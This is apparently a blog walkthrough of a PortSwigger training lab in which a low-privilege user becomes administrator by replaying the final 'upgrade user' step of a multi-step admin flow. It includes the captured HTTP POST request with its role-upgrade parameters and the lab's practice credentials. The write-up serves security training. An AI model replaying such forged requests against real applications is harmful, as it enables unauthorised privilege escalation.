PortSwigger Lab: Multi-step process with no access control on one step

Jun Takemura · March 6, 2025

PortSwigger Lab: Multi-step process with no access control on one step

Task

This lab has an admin panel with a flawed multi-step process for changing a user’s role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Attempt

First let’s understand how the multi-step process for changing a user’s role works.

  1. Log in as administrator
  2. Go to the admin panel
  3. Select a user
  4. Press the ‘upgrade user’ button
  5. Press ‘yes’ when prompted ‘Are you sure?’
  6. The user’s role is set to admin

In step 5, the request below gets sent:

POST /admin-roles HTTP/2
Host: ID.web-security-academy.net
Cookie: session=COOKIE
Content-Length: 45
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

action=upgrade&confirmed=true&username=carlos

While you can’t access the admin panel unless you’re admin, you can send the above request even if you’re not admin, bypassing access control. Sent a request to upgrade wiener with the session cookie of wiener’s worked.

Twitter, Facebook